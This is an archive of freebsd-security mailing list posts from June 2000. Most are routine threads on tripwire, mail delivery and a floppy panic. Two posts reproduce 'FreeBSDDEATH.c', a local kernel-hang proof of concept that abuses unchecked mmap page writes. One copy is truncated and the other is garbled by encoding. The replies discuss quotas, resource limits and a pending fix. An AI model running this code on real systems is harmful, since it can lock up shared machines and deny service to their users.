Thu, 1 Jun 2000 23:25:42 -0700 (PDT) (envelope-from gsh@md.uniyar.ac.ru) Received: from localhost (gsh@localhost) by md.uniyar.ac.ru (8.9.3/8.9.3) with ESMTP id KAA00591 for ; Fri, 2 Jun 2000 10:25:34 +0400 (MSD) (envelope-from gsh@md.uniyar.ac.ru) Date: Fri, 2 Jun 2000 10:25:34 +0400 (MSD) From: "Sergey V. Mikheev" To: freebsd-security@freebsd.org Subject: kernel crashed Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hi! When I trying to use dd if= of=/dev/fd0 on write protected disc system types too many errors and panic and reboot after 15 seconds :( I used FreeBSD 3.3-STABLE #0: Sep 15 1999 ------------------------------------------------------+-----------------------+ ... One child is not enough, but two are far too many.| FreeBSD | | The power to serve! | Mikheev Sergey |http://www.FreeBSD.org/| +=======================+ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jun 2 0:44:12 2000 Delivered-To: freebsd-security@freebsd.org Received: from hosting.doublesquare.com (hosting.doublesquare.com [212.119.162.4]) by hub.freebsd.org (Postfix) with ESMTP id ACCBB37B74E for ; Fri, 2 Jun 2000 00:44:03 -0700 (PDT) (envelope-from ark@eltex.ru) Received: from eltex.ru (eltex-gw2.nw.ru [195.19.203.86] (may be forged)) by hosting.doublesquare.com (8.9.3/8.9.3) with ESMTP id LAA89364 for ; Fri, 2 Jun 2000 11:42:01 +0400 (MSD) From: ark@eltex.ru Received: from yaksha.eltex.ru (root@yaksha.eltex.ru [195.19.198.2]) by eltex.ru (8.9.3/8.9.3) with SMTP id LAA14582; Fri, 2 Jun 2000 11:39:16 +0400 (MSD) Received: by yaksha.eltex.ru (ssmtp TIS-0.6alpha, 19 Jan 2000); Fri, 2 Jun 2000 11:39:17 +0400 Received: from undisclosed-intranet-sender id xma011408; Fri, 2 Jun 00 11:39:01 +0400 Date: Fri, 2 Jun 2000 11:37:35 +0400 Message-Id: <200006020737.LAA15365@paranoid.eltex.spb.ru> Organization: "Klingon Imperial Intelligence Service" Subject: Re: Recommendations for alternative tripwire options To: wollman@khavrinen.lcs.mit.edu Cc: gashalot@gashalot.com, freebsd-security@FreeBSD.ORG Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org -----BEGIN PGP SIGNED MESSAGE----- nuqneH, There is problem with mtree: it works with plaintext database and *much* slower than tripwire or aide. (YMMV) _ _ _ _ _ _ _ {::} {::} {::} CU in Hell _| o |_ | | _|| | / _||_| |_ |_ |_ (##) (##) (##) /Arkan#iD |_ o _||_| _||_| / _| | o |_||_||_| [||] [||] [||] Do i believe in Bible? Hell,man,i've seen one! -----BEGIN PGP SIGNATURE----- Version: 2.6.3i Charset: noconv iQCVAwUBOTdkPaH/mIJW9LeBAQFUiAP5Ae8GzU9RrOfBlc0Rl7hQNQ65C5Cp8wEH oqc3buIncJZRvRl0eD4KV53vY0fx7QAcCAZCDg5fnUSLn+1m0wa9yNBjDiGJpjLA xDXMLRiXWDA0xI8XKKe0zvS33alzflxbtRtVATSbaJeU5cCLae2HPPcMIbLVczD0 blRUgLgC3O4= =OsVx -----END PGP SIGNATURE----- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jun 2 1: 0:18 2000 Delivered-To: freebsd-security@freebsd.org Received: from ulexite.lion-access.net (ulexite.lion-access.net [212.19.217.2]) by hub.freebsd.org (Postfix) with ESMTP id E5F1337B989; Fri, 2 Jun 2000 01:00:03 -0700 (PDT) (envelope-from a.b.goeree@freeler.nl) Received: from freeler.nl (1Cust124.tnt13.rtm1.nl.uu.net [213.53.0.124]) by ulexite.lion-access.net (I-Lab) with ESMTP id CCD27FAF25; Fri, 2 Jun 2000 06:58:23 -0100 (GMT) Message-ID: <39376847.5BCFCDB@freeler.nl> Date: Fri, 02 Jun 2000 09:54:47 +0200 From: Andre Goeree X-Mailer: Mozilla 4.7 [en] (X11; I; FreeBSD 3.4-RELEASE i386) X-Accept-Language: en MIME-Version: 1.0 To: FreeBSD Security , helpdesk freeler , "Majordomo@FreeBSD.ORG" Subject: Mail problems Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org This message is not intended to be published in the freebsd-security mailing, but an attempt to get some answers about what is going wrong with my email. The situation: Since wednesday 05/31/2000 mail is wrongly deliverd to my mailbox., so far i have counted 10 messages. Two of these messages were sent to email addresses at my ISP. All the other messages were sent to freebsd-security and security@freebsd.org. I have forwarded the messages to make sure they would arrive but still have no clue about how they ended up in my mailbox. Sunday 05/28/200 i have subsrcipted to the freebsd-security mailing list. Yesterday i have sent an email to the helpdesk of my ISP explaining the problem, but i have not yet received any reply (because yesterday was a holiday). What strikes me is that the problem occured after i subscripted to the freebsd-security list and that most of the mail was originally sent to freebsd-security. This is also the reason why i am bringing this problem to your attention. Do you have any idea what is going on? Regards, Andre Goeree To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jun 2 1:20:52 2000 Delivered-To: freebsd-security@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 8176137B8B5; Fri, 2 Jun 2000 01:20:49 -0700 (PDT) (envelope-from kris@FreeBSD.org) Received: from localhost (kris@localhost) by freefall.freebsd.org (8.9.3/8.9.2) with ESMTP id BAA21322; Fri, 2 Jun 2000 01:20:49 -0700 (PDT) (envelope-from kris@FreeBSD.org) X-Authentication-Warning: freefall.freebsd.org: kris owned process doing -bs Date: Fri, 2 Jun 2000 01:20:49 -0700 (PDT) From: Kris Kennaway To: Andre Goeree Cc: FreeBSD Security , helpdesk freeler Subject: Re: Mail problems In-Reply-To: <39376847.5BCFCDB@freeler.nl> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Fri, 2 Jun 2000, Andre Goeree wrote: > This message is not intended to be published in the freebsd-security > mailing, but an attempt to get some answers about what is going wrong > with my email. Hmm, then sending it to freebsd-security was probably a bad idea :-) > Since wednesday 05/31/2000 mail is wrongly deliverd to my mailbox., so > far i have counted 10 messages. > Two of these messages were sent to email addresses at my ISP. > All the other messages were sent to freebsd-security and > security@freebsd.org. > I have forwarded the messages to make sure they would arrive but still Err, thats how email works. Welcome to the Internet :-) Kris ---- In God we Trust -- all others must submit an X.509 certificate. -- Charles Forsythe To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jun 2 4:55:47 2000 Delivered-To: freebsd-security@freebsd.org Received: from ns1.via-net-works.net.ar (ns1.via-net-works.net.ar [200.10.100.10]) by hub.freebsd.org (Postfix) with ESMTP id 7CEE937B69E for ; Fri, 2 Jun 2000 04:55:41 -0700 (PDT) (envelope-from fpscha@ns1.via-net-works.net.ar) Received: (from fpscha@localhost) by ns1.via-net-works.net.ar (8.9.3/8.9.3) id IAA24368; Fri, 2 Jun 2000 08:52:29 -0300 (GMT) From: Fernando Schapachnik Message-Id: <200006021152.IAA24368@ns1.via-net-works.net.ar> Subject: Re: gnapster dos(?) In-Reply-To: <00060121355101.00534@reddog.yi.org> from specter at "Jun 1, 0 09:33:54 pm" To: ai32@drexel.edu (specter) Date: Fri, 2 Jun 2000 08:52:29 -0300 (GMT) Cc: freebsd-security@FreeBSD.ORG Reply-To: Fernando Schapachnik X-Mailer: ELM [version 2.4ME+ PL40 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 8bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org If I'm not wrong this was published in bugtraq a while ago... Regards! En un mensaje anterior, specter escribiС: > Hello, > > Can anyone else verify this :- > > Gnapster Version : 1.3.9 & 1.3.10 > Host: FreeBSD 4.0-Release, x86 Fernando P. Schapachnik AdministraciСn de la red VIA NET.WORKS ARGENTINA S.A. fernando@via-net-works.net.ar (54-11) 4323-3333 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jun 2 5: 9:49 2000 Delivered-To: freebsd-security@freebsd.org Received: from flood.ping.uio.no (flood.ping.uio.no [129.240.78.31]) by hub.freebsd.org (Postfix) with ESMTP id A3B3337BE5F; Fri, 2 Jun 2000 05:09:45 -0700 (PDT) (envelope-from des@flood.ping.uio.no) Received: (from des@localhost) by flood.ping.uio.no (8.9.3/8.9.3) id OAA59915; Fri, 2 Jun 2000 14:09:16 +0200 (CEST) (envelope-from des@flood.ping.uio.no) To: Andre Goeree Cc: FreeBSD Security , helpdesk freeler , "Majordomo@FreeBSD.ORG" Subject: Re: Mail problems References: <39376847.5BCFCDB@freeler.nl> From: Dag-Erling Smorgrav Date: 02 Jun 2000 14:09:16 +0200 In-Reply-To: Andre Goeree's message of "Fri, 02 Jun 2000 09:54:47 +0200" Message-ID: Lines: 9 User-Agent: Gnus/5.0802 (Gnus v5.8.2) Emacs/20.4 MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Andre Goeree writes: > Do you have any idea what is going on? Yes - you're receiving mail from the freebsd-security list, as you requested. What did you think "subscription" meant? DES -- Dag-Erling Smorgrav - des@flood.ping.uio.no To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jun 2 6: 3: 5 2000 Delivered-To: freebsd-security@freebsd.org Received: from closed-networks.com (closed-networks.com [195.153.248.242]) by hub.freebsd.org (Postfix) with SMTP id 9B0FD37B540 for ; Fri, 2 Jun 2000 06:02:58 -0700 (PDT) (envelope-from udp@closed-networks.com) Received: (qmail 7362 invoked by uid 1021); 2 Jun 2000 13:09:06 -0000 Mail-Followup-To: freebsd-security@freebsd.org Date: Fri, 2 Jun 2000 14:09:06 +0100 From: User Datagram Protocol To: freebsd-security@freebsd.org Subject: FreeBSDDEATH.c.txt (mmap dirty page no check bug) Message-ID: <20000602140906.I70438@closed-networks.com> Reply-To: User Datagram Protocol Mime-Version: 1.0 Content-Type: multipart/mixed; boundary="nOM8ykUjac0mNN89" Content-Transfer-Encoding: 8bit X-Mailer: Mutt 1.0.1i X-Echelon: MI6 Cobra GCHQ Panavia MI5 Timberline IRA NSA Mossad CIA Copperhead Organization: Closed Networks Limited, London, UK Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org --nOM8ykUjac0mNN89 Content-Type: text/plain; charset=us-ascii Yo, This seems to be doing the rounds with the script kiddies fairly quickly. I've attached it. (originally found at: http://ls.si.ru/tmp/FreeBSDDEATH.c.txt - dumped by some skr1pt k1dd1es on irc) vnode_pager_putpages() only does this check against the return value of VOP_PUTPAGES(): rtval = VOP_PUTPAGES(vp, m, bytes, sync, rtvals, 0); if (rtval == EOPNOTSUPP) { And vnode_pager_generic_putpages() appears to force the return value for all page writes that it does to VM_PAGER_OK even when an error occurs in VOP_WRITE(). The above is based on a quick inspection of the 4.0-STABLE fork source tree. So, this guy has a point. Apologies if this issue was posted to any other lists, but it came my way, I am not currently on bugtraq due to some mail issues, and it looks like something we should be aware of (albeit really a quality of implementation issue that gets hit during times of high load - like something else I have in the pipeline. Heh.) Regards -- Bruce M. Simpson aka 'udp' Security Analyst & UNIX Development Engineer WWW: www.closed-networks.com/~udp Dundee www.packetfactory.net/~udp United Kingdom email: udp@closed-networks.com --nOM8ykUjac0mNN89 Content-Type: text/plain Content-Disposition: attachment; filename="FreeBSDDEATH.c.txt" Content-Transfer-Encoding: 8bit /* From: Oleg Derevenetz Date: Wed, 31 May 2000 19:04:12 +0400 Subject: mmap Message-ID: <959790285@p4.f3.n5025.z2.ftn> Draft English translation: in vnode_pager.c there is no any check for errors on write of ditry mmap'ed pages to disk. If there is no enough space or any other I/O error occur, the results will be very bad. It will be good to kill the calling process, but it's hard to find out the owner of offending page. Дело в том, что в vnode_pager.c не предусмотрена никакая обработка ошибок при сбросе грязных mmap'ленных страниц файла на диск, если на диске недостаточно места для такого сброса (да и вообще при любой ошибке I/O), и это приводит к очень плохим результатам. Где-то полгода назад я переписывался с людьми из freebsd.hackers, они меня по большому счету просто послали. VM сделана достаточно криво, поэтому мне придумать реакцию на такую проблему пока не удалось. Желательно было бы прибить процесс, но извлечь информацию о том, какому процессу принадлежит страница, при сбросе которой произошла ошибка, весьма затруднительно. Вот сижу сейчас, ломаю голову, что делать... Кстати, а здесь никто не занимается ядерным VM ? */ #include #include #include #include #include #include #define COUNT 1024*1024 #define SIZE 10*1024*1024 int main () { int i,j,fd; char *fptr, fname [16]; for (i=0;i; Fri, 2 Jun 2000 06:35:06 -0700 (PDT) (envelope-from Cy.Schubert@uumail.gov.bc.ca) Received: (from daemon@localhost) by point.osg.gov.bc.ca (8.8.7/8.8.8) id GAA03295 for ; Fri, 2 Jun 2000 06:35:05 -0700 Received: from passer.osg.gov.bc.ca(142.32.110.29) via SMTP by point.osg.gov.bc.ca, id smtpda03293; Fri Jun 2 06:35:03 2000 Received: (from uucp@localhost) by passer.osg.gov.bc.ca (8.9.3/8.9.1) id GAA05161 for ; Fri, 2 Jun 2000 06:35:03 -0700 (PDT) Received: from cwsys9.cwsent.com(10.2.2.1), claiming to be "cwsys.cwsent.com" via SMTP by passer9.cwsent.com, id smtpdwe5156; Fri Jun 2 06:34:13 2000 Received: (from uucp@localhost) by cwsys.cwsent.com (8.10.1/8.9.1) id e52DYCk53611 for ; Fri, 2 Jun 2000 06:34:12 -0700 (PDT) Message-Id: <200006021334.e52DYCk53611@cwsys.cwsent.com> Received: from localhost.cwsent.com(127.0.0.1), claiming to be "cwsys" via SMTP by localhost.cwsent.com, id smtpdw53607; Fri Jun 2 06:33:55 2000 X-Mailer: exmh version 2.1.1 10/15/1999 Reply-To: Cy Schubert - ITSD Open Systems Group From: Cy Schubert - ITSD Open Systems Group X-OS: FreeBSD 4.0-STABLE X-Sender: cy To: freebsd-security@freebsd.org Subject: Re: ports/18964: New Tripwire 1.3.1 Port (fwd) Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Date: Fri, 02 Jun 2000 06:33:54 -0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org For those of you looking for the port, here it is. Regards, Phone: (250)387-8437 Cy Schubert Fax: (250)387-5766 Team Leader, Sun/DEC Team Internet: Cy.Schubert@osg.gov.bc.ca Open Systems Group, ITSD, ISTA Province of BC ------- Forwarded Message Return-Path: cschuber@osg.gov.bc.ca Delivery-Date: Fri Jun 2 06:32:13 2000 Received: (from uucp@localhost) by cwsys.cwsent.com (8.10.1/8.9.1) id e52DWCY53593 for ; Fri, 2 Jun 2000 06:32:12 -0700 (PDT) Received: from passer9.cwsent.com(10.2.2.2), claiming to be "passer.osg.gov.bc.ca" via SMTP by cwsys9.cwsent.com, id smtpdv53591; Fri Jun 2 06:32:05 2000 Received: (from uucp@localhost) by passer.osg.gov.bc.ca (8.9.3/8.9.1) id GAA05151 for ; Fri, 2 Jun 2000 06:32:03 -0700 (PDT) Resent-Message-Id: <200006021332.GAA05151@passer.osg.gov.bc.ca> Received: from localhost.osg.gov.bc.ca(127.0.0.1), claiming to be "passer.osg.gov.bc.ca" via SMTP by localhost.osg.gov.bc.ca, id smtpdrs5142; Fri Jun 2 06:31:03 2000 Delivery-Date: Fri, 02 Jun 2000 06:31:03 -0700 Received: (from uucp@localhost) by passer.osg.gov.bc.ca (8.9.3/8.9.1) id GAA05134 for ; Fri, 2 Jun 2000 06:31:03 -0700 (PDT) Received: from point.osg.gov.bc.ca(142.32.102.44) via SMTP by passer.osg.gov.bc.ca, id smtpdxM5130; Fri Jun 2 06:30:05 2000 Received: (from daemon@localhost) by point.osg.gov.bc.ca (8.8.7/8.8.8) id GAA03284 for ; Fri, 2 Jun 2000 06:30:05 -0700 Received: from hub.FreeBSD.ORG(204.216.27.18) via SMTP by point.osg.gov.bc.ca, id smtpda03282; Fri Jun 2 06:30:04 2000 Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id ACEB837B8A5 for ; Fri, 2 Jun 2000 06:30:03 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id GAA78759; Fri, 2 Jun 2000 06:30:03 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Date: Fri, 2 Jun 2000 06:30:03 -0700 (PDT) Message-Id: <200006021330.GAA78759@freefall.freebsd.org> To: Cy.Schubert@uumail.gov.bc.ca From: gnats-admin@FreeBSD.org Subject: Re: ports/18964: New Tripwire 1.3.1 Port Reply-To: gnats-admin@FreeBSD.org, freebsd-ports@FreeBSD.org In-Reply-To: Your message of Fri, 2 Jun 2000 06:23:26 -0700 (PDT) <200006021323.e52DNQo53559@cwsys.cwsent.com> Sender: gnats@FreeBSD.org Resent-To: cy@passer.osg.gov.bc.ca Resent-Date: Fri, 02 Jun 2000 06:31:03 -0700 Resent-From: Cy Schubert Thank you very much for your problem report. It has the internal identification `ports/18964'. The individual assigned to look at your report is: freebsd-ports. You can access the state of your problem report at any time via this link: http://www.freebsd.org/cgi/query-pr.cgi?pr=18964 >Category: ports >Responsible: freebsd-ports >Synopsis: new tripwire-1.3.1 port >Arrival-Date: Fri Jun 02 06:30:02 PDT 2000 ------- End of Forwarded Message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jun 2 6:43:35 2000 Delivered-To: freebsd-security@freebsd.org Received: from wat-border.sentex.ca (waterloo-hespler.sentex.ca [199.212.135.66]) by hub.freebsd.org (Postfix) with ESMTP id 0051637B5D7 for ; Fri, 2 Jun 2000 06:43:32 -0700 (PDT) (envelope-from mike@sentex.ca) Received: from granite.sentex.net (granite-atm.sentex.ca [209.112.4.1]) by wat-border.sentex.ca (8.9.3/8.9.3) with ESMTP id JAA82237 for ; Fri, 2 Jun 2000 09:42:57 -0400 (EDT) (envelope-from mike@sentex.ca) Received: from simoeon (simeon.sentex.ca [209.112.4.47]) by granite.sentex.net (8.8.8/8.6.9) with SMTP id JAA04560 for ; Fri, 2 Jun 2000 09:42:57 -0400 (EDT) Message-Id: <3.0.5.32.20000602093923.0309ed60@marble.sentex.ca> X-Sender: mdtpop@marble.sentex.ca X-Mailer: QUALCOMM Windows Eudora Light Version 3.0.5 (32) Date: Fri, 02 Jun 2000 09:39:23 -0400 To: freebsd-security@FreeBSD.ORG From: Mike Tancsa Subject: Re: FreeBSDDEATH.c.txt (mmap dirty page no check bug) In-Reply-To: <20000602140906.I70438@closed-networks.com> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org At 02:09 PM 6/2/00 +0100, User Datagram Protocol wrote: >This seems to be doing the rounds with the script kiddies fairly quickly. >I've attached it. >(originally found at: http://ls.si.ru/tmp/FreeBSDDEATH.c.txt - dumped >by some skr1pt k1dd1es on irc) Using the following login class safe:\ :copyright=/etc/COPYRIGHT:\ :welcome=/etc/motd:\ :setenv=MAIL=/var/mail/$,BLOCKSIZE=K,FTP_PASSIVE_MODE=YES:\ :path=/sbin /bin /usr/sbin /usr/bin /usr/games /usr/local/sbin /usr/local/bin /usr/X11R6/bin ~/bin:\ :nologin=/var/run/nologin:\ :cputime=unlimited:\ :datasize=64M:\ :stacksize=8M:\ :memorylocked=64M:\ :memoryuse=64M:\ :filesize=64M:\ :coredumpsize=64M:\ :openfiles=32:\ :maxproc=32:\ :priority=0:\ :ignoretime@:\ :umask=022: and running the attached program does not seem to have any effect under 4.0-STABLE FreeBSD 4.0-STABLE #0: Thu Jun 1 10:05:47 EDT 2000 ... Or has this problem been fixed recently ? ---Mike ------------------------------------------------------------------------ Mike Tancsa, tel +1 519 651 3400 Sentex Communications mike@sentex.net Cambridge, Ontario Canada www.sentex.net To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jun 2 9: 8:31 2000 Delivered-To: freebsd-security@freebsd.org Received: from apollo.backplane.com (apollo.backplane.com [216.240.41.2]) by hub.freebsd.org (Postfix) with ESMTP id 8485637B76F for ; Fri, 2 Jun 2000 09:08:29 -0700 (PDT) (envelope-from dillon@apollo.backplane.com) Received: (from dillon@localhost) by apollo.backplane.com (8.9.3/8.9.1) id JAA47864; Fri, 2 Jun 2000 09:08:22 -0700 (PDT) (envelope-from dillon) Date: Fri, 2 Jun 2000 09:08:22 -0700 (PDT) From: Matthew Dillon Message-Id: <200006021608.JAA47864@apollo.backplane.com> To: Mike Tancsa Cc: freebsd-security@FreeBSD.ORG Subject: Re: FreeBSDDEATH.c.txt (mmap dirty page no check bug) References: <3.0.5.32.20000602093923.0309ed60@marble.sentex.ca> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org :>This seems to be doing the rounds with the script kiddies fairly quickly. :>I've attached it. :>(originally found at: http://ls.si.ru/tmp/FreeBSDDEATH.c.txt - dumped :>by some skr1pt k1dd1es on irc) If you go back one day Oleg posted the same snippit. It is possible to lockup a machine with this code, but the program isn't going to be very effective on any machine with public shell accounts if that machine has quotas enabled. I put quotas on every partition users had access to at BEST, including /tmp (100MB quota). In fact, /tmp turned out to be the single most important partition to put a quota on due to the sheer number of programs that just assumed it would never fill up (and the sheer number of bozo users who would use /tmp to unpack warez and never delete any of it). I should be able to get a fix in this weekend. -Matt To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jun 2 9: 9:45 2000 Delivered-To: freebsd-security@freebsd.org Received: from scientia.demon.co.uk (scientia.demon.co.uk [212.228.14.13]) by hub.freebsd.org (Postfix) with ESMTP id 3581D37BFFC for ; Fri, 2 Jun 2000 09:09:40 -0700 (PDT) (envelope-from ben@scientia.demon.co.uk) Received: from strontium.scientia.demon.co.uk ([192.168.91.36] ident=exim) by scientia.demon.co.uk with esmtp (Exim 3.12 #1) id 12xrLU-0005Vz-00; Fri, 02 Jun 2000 14:18:40 +0100 Received: (from ben) by strontium.scientia.demon.co.uk (Exim 3.12 #7) id 12xrLT-0002K4-00; Fri, 02 Jun 2000 14:18:39 +0100 Date: Fri, 2 Jun 2000 14:18:39 +0100 From: Ben Smithurst To: User Datagram Protocol Cc: freebsd-security@freebsd.org Subject: Re: FreeBSDDEATH.c.txt (mmap dirty page no check bug) Message-ID: <20000602141839.G99925@strontium.scientia.demon.co.uk> References: <20000602140906.I70438@closed-networks.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 1.0i In-Reply-To: <20000602140906.I70438@closed-networks.com> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org User Datagram Protocol wrote: > Apologies if this issue was posted to any other lists, but it came my way, > I am not currently on bugtraq due to some mail issues, and it looks like > something we should be aware of (albeit really a quality of implementation > issue that gets hit during times of high load - like something else I have > in the pipeline. Heh.) This was posted on freebsd-hackers, it looks like the code below was taken verbatim from there. Matt Dillon said he'll look at it this weekend. Not long now... I haven't seen it on Bugtraq, though I may have missed it. -- Ben Smithurst / ben@scientia.demon.co.uk / PGP: 0x99392F7D To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jun 2 12: 4:57 2000 Delivered-To: freebsd-security@freebsd.org Received: from ewey.excite.com (ewey-rwcmta.excite.com [198.3.99.191]) by hub.freebsd.org (Postfix) with ESMTP id DF23937BB44 for ; Fri, 2 Jun 2000 12:04:50 -0700 (PDT) (envelope-from sergiovf@excite.com) Received: from knuckles.excite.com ([199.172.148.179]) by ewey.excite.com (InterMail vM.4.01.02.39 201-229-119-122) with ESMTP id <20000602190450.CNBL28401.ewey.excite.com@knuckles.excite.com> for ; Fri, 2 Jun 2000 12:04:50 -0700 Message-ID: <21786238.959972690834.JavaMail.imail@knuckles.excite.com> Date: Fri, 2 Jun 2000 12:04:50 -0700 (PDT) From: Sergio Valdes-Flores To: freebsd-security@freebsd.org Subject: Re: FreeBSDDEATH.c.txt (mmap dirty page no check bug) Mime-Version: 1.0 Content-Type: text/plain; charset=iso-8859-1 Content-Transfer-Encoding: quoted-printable X-Mailer: Excite Inbox X-Sender-Ip: 216.242.60.82 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org http://ls.si.ru/tmp/FreeBSDDEATH-2.c (dash not dot) this is the page: ----------------- /* From: Create 1GB file, fill it with 1s. The kernel (may|will) hang. */ int main(int argc,char **argv) { int pages=3D256*1024; char *p; int fd,i; char filename[]=3D"./junk.XXXXXXXX"; fd=3Dmkstemp(filename); ftruncate(fd,pages*4096); =20 p=3D(char*)mmap(NULL,pages*4096,PROT_READ|PROT_WRITE,MAP_SHARED|MAP_NOSYNC,= fd,0); for (i=3D0;i Yo, > =20 > This seems to be doing the rounds with the script kiddies fairly quickly= . > I've attached it. > (originally found at: http://ls.si.ru/tmp/FreeBSDDEATH.c.txt - dumped > by some skr1pt k1dd1es on irc) > =20 > vnode_pager_putpages() only does this check against the return value of > VOP_PUTPAGES(): > rtval =3D VOP_PUTPAGES(vp, m, bytes, sync, rtvals, 0); > if (rtval =3D=3D EOPNOTSUPP) { > =20 > And vnode_pager_generic_putpages() appears to force the return value for > all page writes that it does to VM_PAGER_OK even when an error occurs in > VOP_WRITE(). > =20 > The above is based on a quick inspection of the 4.0-STABLE fork source tree. > So, this guy has a point. > =20 > Apologies if this issue was posted to any other lists, but it came my way, > I am not currently on bugtraq due to some mail issues, and it looks like > something we should be aware of (albeit really a quality of implementation > issue that gets hit during times of high load - like something else I have > in the pipeline. Heh.) > =20 > Regards > --=20 > Bruce M. Simpson aka 'udp' Security Analyst & UNIX Development Engineer > WWW: www.closed-networks.com/~udp=20 > Dundee =20 www.packetfactory.net/~udp > United Kingdom email: =20 udp@closed-networks.com > /* > From: Oleg Derevenetz > Date: Wed, 31 May 2000 19:04:12 +0400 > Subject: mmap > Message-ID: <959790285@p4.f3.n5025.z2.ftn> > =20 > Draft English translation: in vnode_pager.c there is no any check for > errors on write of ditry mmap'ed pages to disk. If there is no enough > space or any other I/O error occur, the results will be very bad. > =20 > It will be good to kill the calling process, but it's hard to find out > the owner of offending page. > =20 > =E4=C5=CC=CF =D7 =D4=CF=CD, =DE=D4=CF =D7 vnode_pager.c =CE=C5 =D0=D2=C5= =C4=D5=D3=CD=CF=D4=D2=C5=CE=C1 =CE=C9=CB=C1=CB=C1=D1 =CF=C2=D2=C1=C2=CF=D4= =CB=C1 > =CF=DB=C9=C2=CF=CB =D0=D2=C9 =D3=C2=D2=CF=D3=C5 =C7=D2=D1=DA=CE=D9=C8 mm= ap'=CC=C5=CE=CE=D9=C8 =D3=D4=D2=C1=CE=C9=C3 =C6=C1=CA=CC=C1 =CE=C1 =C4=C9= =D3=CB, =C5=D3=CC=C9 =CE=C1 > =C4=C9=D3=CB=C5 =CE=C5=C4=CF=D3=D4=C1=D4=CF=DE=CE=CF =CD=C5=D3=D4=C1 =C4= =CC=D1 =D4=C1=CB=CF=C7=CF =D3=C2=D2=CF=D3=C1 (=C4=C1 =C9 =D7=CF=CF=C2=DD=C5= =D0=D2=C9 =CC=C0=C2=CF=CA =CF=DB=C9=C2=CB=C5 > I/O), =C9 =DC=D4=CF =D0=D2=C9=D7=CF=C4=C9=D4 =CB =CF=DE=C5=CE=D8 =D0=CC= =CF=C8=C9=CD =D2=C5=DA=D5=CC=D8=D4=C1=D4=C1=CD. =E7=C4=C5-=D4=CF =D0=CF=CC= =C7=CF=C4=C1 =CE=C1=DA=C1=C4 =D1 > =D0=C5=D2=C5=D0=C9=D3=D9=D7=C1=CC=D3=D1 =D3 =CC=C0=C4=D8=CD=C9 =C9=DA fr= eebsd.hackers, =CF=CE=C9 =CD=C5=CE=D1 =D0=CF =C2=CF=CC=D8=DB=CF=CD=D5 =D3= =DE=C5=D4=D5 > =D0=D2=CF=D3=D4=CF =D0=CF=D3=CC=C1=CC=C9. VM =D3=C4=C5=CC=C1=CE=C1 =C4= =CF=D3=D4=C1=D4=CF=DE=CE=CF =CB=D2=C9=D7=CF, =D0=CF=DC=D4=CF=CD=D5 =CD=CE= =C5 =D0=D2=C9=C4=D5=CD=C1=D4=D8 > =D2=C5=C1=CB=C3=C9=C0 =CE=C1 =D4=C1=CB=D5=C0 =D0=D2=CF=C2=CC=C5=CD=D5 = =D0=CF=CB=C1 =CE=C5 =D5=C4=C1=CC=CF=D3=D8. =F6=C5=CC=C1=D4=C5=CC=D8=CE=CF = =C2=D9=CC=CF =C2=D9 =D0=D2=C9=C2=C9=D4=D8 > =D0=D2=CF=C3=C5=D3=D3, =CE=CF =C9=DA=D7=CC=C5=DE=D8 =C9=CE=C6=CF=D2=CD= =C1=C3=C9=C0 =CF =D4=CF=CD, =CB=C1=CB=CF=CD=D5 =D0=D2=CF=C3=C5=D3=D3=D5 =D0= =D2=C9=CE=C1=C4=CC=C5=D6=C9=D4 > =D3=D4=D2=C1=CE=C9=C3=C1, =D0=D2=C9 